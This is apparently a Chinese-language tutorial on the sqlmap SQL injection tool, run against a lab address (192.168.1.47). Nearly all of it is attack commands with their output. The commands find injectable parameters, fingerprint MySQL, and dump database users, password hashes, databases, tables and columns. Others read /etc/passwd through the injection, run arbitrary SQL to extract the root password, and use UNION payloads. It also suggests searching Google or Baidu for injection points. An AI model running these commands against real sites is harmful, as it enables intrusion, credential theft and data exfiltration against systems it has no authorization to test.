1、首先安装python2.5。
2、然后进入sqlmap的目录,执行sqlmap
详细用法
1、sqlmap -u 注入点
2、sqlmap -g "关键词“ //这是通过google搜索注入,现在还不可以,不知道是什么原因,可以直接修改为百度
3、
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1
[hh:mm:25] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:26] [INFO] url is stable
[hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:26] [INFO] GET parameter 'id' is dynamic
[hh:mm:26] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter
'id'
[hh:mm:26] [INFO] confirming numeric/unescaped injection on GET
parameter 'id'
[hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:26] [INFO] testing MySQL
[hh:mm:26] [INFO] query: CONCAT('5', '5')
[hh:mm:26] [INFO] retrieved: 55
[hh:mm:26] [INFO] performed 20 queries in 0 seconds
[hh:mm:26] [INFO] confirming MySQL
[hh:mm:26] [INFO] query: LENGTH('5')
[hh:mm:26] [INFO] retrieved: 1
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
[hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT
0, 1
[hh:mm:26] [INFO] retrieved: 5
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
remote DBMS: MySQL >= 5.0.0
4、指定参数注入
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1
-p "id"
[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:18] [INFO] url is stable
[hh:mm:18] [INFO] testing sql injection on parameter 'id'
[hh:mm:18] [INFO] testing numeric/unescaped injection on parameter
'id'
[hh:mm:18] [INFO] confirming numeric/unescaped injection on
parameter 'id'
[hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable
[...]
Or if you want to provide more than one parameter, for instance:
$ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v
1 -p "cat,id"
5、指定方法和post的数据
python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" --
data "id=1&cat=2"
6、指定cookie,可以注入一些需要登录的地址
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie
"COOKIE_VALUE"
7、通过代理注入
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy
"http://127.0.0.1:8118"
8、指定关键词,也可以不指定。程序会根据返回结果的hash自动判断
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string
"STRING_ON_TRUE_PAGE"
9、指定数据,这样就不用猜测其他的数据库里。可以提高效率。
--remote-dbms
10、指纹判别数据库类型
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f
11、获取banner信息
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
12、获取当前数据库,当前用户,所有用户,密码,所有可用数据库。
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --
current-db
current database: 'testdb'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'leboyer'
[*] 'root'@'localhost'
[*] 'testuser'@'localhost'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --
passwords
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[*] root [1]:
password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
[*] testuser [1]:
password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs
available databases [3]:
[*] information_schema
[*] mysql
[*] testdb
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables
-D "information_schema"
Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLLATIONS |
| COLUMN_PRIVILEGES |
| COLUMNS |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMA_PRIVILEGES |
| SCHEMATA |
| STATISTICS |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --
columns -T "user" -D "mysql"
Database: mysql
Table: user
[37 columns]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| Alter_priv | enum |
| Alter_routine_priv | enum |
| Create_priv | enum |
| Create_routine_priv | enum |
| Create_tmp_table_priv | enum |
| Create_user_priv | enum |
| Create_view_priv | enum |
| Delete_priv | enum |
| Drop_priv | enum |
| Execute_priv | enum |
| File_priv | enum |
| Grant_priv | enum |
| Host | char |
| Index_priv | enum |
| Insert_priv | enum |
| Lock_tables_priv | enum |
| max_connections | int |
| max_questions | int |
| max_updates | int |
| max_user_connections | int |
| Password | char |
| Process_priv | enum |
| References_priv | enum |
| Reload_priv | enum |
| Repl_client_priv | enum |
| Repl_slave_priv | enum |
| Select_priv | enum |
| Show_db_priv | enum |
| Show_view_priv | enum |
| Shutdown_priv | enum |
| ssl_cipher | blob |
| ssl_type | enum |
| Super_priv | enum |
| Update_priv | enum |
| User | char |
| x509_issuer | blob |
| x509_subject | blob |
+-----------------------+------+
13、显示指定的文件内容,一般用于php
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file /
etc/passwd
/etc/passwd:
---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/
bin/bash
inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash
---
14、执行你自己的sql语句。
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e
"SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1"
[hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM
mysql.user WHERE user = 'root' LIMIT 0, 1'
[hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user =
'root' LIMIT 0, 1
[hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY
[hh:mm:19] [INFO] performed 118 queries in 0 seconds
SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1:
'YYYYYYYYYYYYYYYY'
15、union注入
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --union-
check
valid union: 'http://192.168.1.47/page.php?id=1 UNION ALL SELECT
NULL, NULL, NULL--&cat=2'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --
union-use --banner
[...]
[hh:mm:24] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:24] [INFO] the target url could be affected by an inband sql
injection vulnerability
[hh:mm:24] [INFO] confirming inband sql injection on parameter 'id'
[...]
[hh:mm:24] [INFO] fetching banner
[hh:mm:24] [INFO] request: http://192.168.1.47/page.php?id=1 UNION ALL
SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(),
CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2
[hh:mm:24] [INFO] performed 1 queries in 0 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
16、保存注入过程到一个文件,还可以从文件恢复出注入过程,很方便,一大特色。你可以在注入的时候中断,有时间再继续。
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b -
o "sqlmap.log"
[...]
[hh:mm:09] [INFO] fetching banner
[hh:mm:09] [INFO] query: VERSION()
[hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log
[hh:mm:11] [INFO] performed 139 queries in 1 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --
banner -o "sqlmap.log" --resume
[...]
[hh:mm:13] [INFO] fetching banner
[hh:mm:13] [INFO] query: VERSION()
[hh:mm:13] [INFO] retrieved the length of query: 26
[hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb
[hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log
banner: